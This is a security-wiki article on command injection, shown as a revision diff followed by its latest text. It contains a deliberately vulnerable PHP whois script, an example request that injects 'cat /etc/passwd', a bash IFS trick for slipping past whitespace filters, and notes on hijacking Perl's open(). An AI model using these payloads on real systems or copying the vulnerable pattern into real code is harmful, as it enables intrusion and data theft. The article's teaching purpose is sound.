Difference between revisions of "Command Injection"
Rochell4259 (Talk | contribs) |
|||
(21 intermediate revisions by 6 users not shown) | |||
Line 1: | Line 1: | ||
+ | <font size="-2">Special thanks to [[User:Xochipilli|xo]] for his contributions to this article.</font> | ||
= Overview = | = Overview = | ||
− | A [[Command Injection]] [[vulnerability]] occurs when unsanitized user [[input]] is passed to a system shell (system(), exec() etc). | + | A [[Command Injection]] [[vulnerability]] is an escape string or format string [[vulnerability]] that occurs when unsanitized user [[input]] is passed to a system shell (system(), exec() etc). An attacker can exploit this vulnerability with a command sequence appended to the appropriate format or escape string to execute arbitrary commands. An attacker exploiting this vulnerability may as well have a remote shell. |
− | == | + | == Testing for Injection == |
+ | During any [[web applications|web application]] testing, remember that any [[Web_Exploitation#Attack_Vectors|HTTP input]] could be vulnerable. | ||
− | + | Testing for command injections is possible by appending a command to any of the following escape strings: | |
+ | * ''';''' | ||
+ | * '''|''' | ||
+ | * '''&''' | ||
+ | * '''&&''' | ||
− | + | Testing for [[bash]] command substitution may also apply. | |
+ | * `` | ||
+ | * $() | ||
+ | == Example vulnerability == | ||
+ | {{warning|This code is vulnerable. Do not use as a [[whois]] tool on your site.}} | ||
+ | |||
+ | '''vulnerable.php''':{{code | ||
+ | |text= | ||
<syntaxhighlight lang="php"> | <syntaxhighlight lang="php"> | ||
<?php | <?php | ||
− | $whois=system("whois $_GET['domain']"); | + | $whois=system("whois {$_GET['domain']}"); |
− | echo($whois); | + | echo($whois); |
− | ?> | + | ?></syntaxhighlight> |
− | </syntaxhighlight> | + | }} |
− | + | == Exploitation == | |
+ | |||
+ | == UNIX == | ||
On a UNIX shell, commands can be injected in a number of ways. Using a semicolon, which delimits commands: | On a UNIX shell, commands can be injected in a number of ways. Using a semicolon, which delimits commands: | ||
Line 31: | Line 46: | ||
/whois.php?domain=www.google.com;cat /etc/passwd | /whois.php?domain=www.google.com;cat /etc/passwd | ||
− | + | {{quote|Use the IFS environment variable in [[bash]] to create whitespace if it is not allowed by filters|Xochipilli}} | |
+ | |||
+ | xo@lux ~ $ echo${IFS}lol | ||
+ | lol | ||
== Perl == | == Perl == | ||
Line 39: | Line 57: | ||
In addition to system() and exec(), [[Perl|Perl's]] [http://perldoc.perl.org/functions/open.html open()] function can also execute commands, because it is used to open pipes. In this case, you can use | as a delimiter, because [[Perl]] looks for | to indicate that open() is opening a pipe. An attacker can hijack an open() call which otherwise would not even execute a command by adding a | to his query. | In addition to system() and exec(), [[Perl|Perl's]] [http://perldoc.perl.org/functions/open.html open()] function can also execute commands, because it is used to open pipes. In this case, you can use | as a delimiter, because [[Perl]] looks for | to indicate that open() is opening a pipe. An attacker can hijack an open() call which otherwise would not even execute a command by adding a | to his query. | ||
− | {{ | + | {{expand}} |
− | + | ||
− | + | {{exploitation}} | |
− | }} | + | {{social}} |
+ | [[Category:Web exploitation]] |
Latest revision as of 03:36, 20 September 2012
Special thanks to xo for his contributions to this article.
Contents
Overview
A Command Injection vulnerability is an escape string or format string vulnerability that occurs when unsanitized user input is passed to a system shell (system(), exec() etc). An attacker can exploit this vulnerability with a command sequence appended to the appropriate format or escape string to execute arbitrary commands. An attacker exploiting this vulnerability may as well have a remote shell.
Testing for Injection
During any web application testing, remember that any HTTP input could be vulnerable.
Testing for command injections is possible by appending a command to any of the following escape strings:
- ;
- |
- &
- &&
Testing for bash command substitution may also apply.
- ``
- $()
Example vulnerability
This code is vulnerable. Do not use as a whois tool on your site. |
vulnerable.php:
<syntaxhighlight lang="php"> <?php $whois=system("whois {$_GET['domain']}"); echo($whois); ?></syntaxhighlight> |
Exploitation
UNIX
On a UNIX shell, commands can be injected in a number of ways. Using a semicolon, which delimits commands:
cd ~; ls
Using an ampersand, a control operator:
cd ~ && ls
Using a pipe, a bash operator for stringing commands together:
ls | grep filename
Or using backticks or a $ for command substitution
ls /home/$(whoami)
or
ls /home/`whoami`
An attacker could use any of these to inject and execute a command using the above script by requesting:
/whois.php?domain=www.google.com;cat /etc/passwd
Xochipilli says |
---|
Use the IFS environment variable in bash to create whitespace if it is not allowed by filters |
xo@lux ~ $ echo${IFS}lol lol
Perl
A slightly lesser known command injection technique uses Perl's open() function. This is useful for exploiting CGI scripts.
In addition to system() and exec(), Perl's open() function can also execute commands, because it is used to open pipes. In this case, you can use | as a delimiter, because Perl looks for | to indicate that open() is opening a pipe. An attacker can hijack an open() call which otherwise would not even execute a command by adding a | to his query.
This article contains too little information, it should be expanded or updated. |
---|
Things you can do to help:
|